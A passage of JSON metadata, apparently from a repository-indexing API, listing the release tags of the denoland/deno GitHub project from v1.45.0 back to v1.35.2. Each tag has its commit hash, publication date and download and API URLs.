10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codelo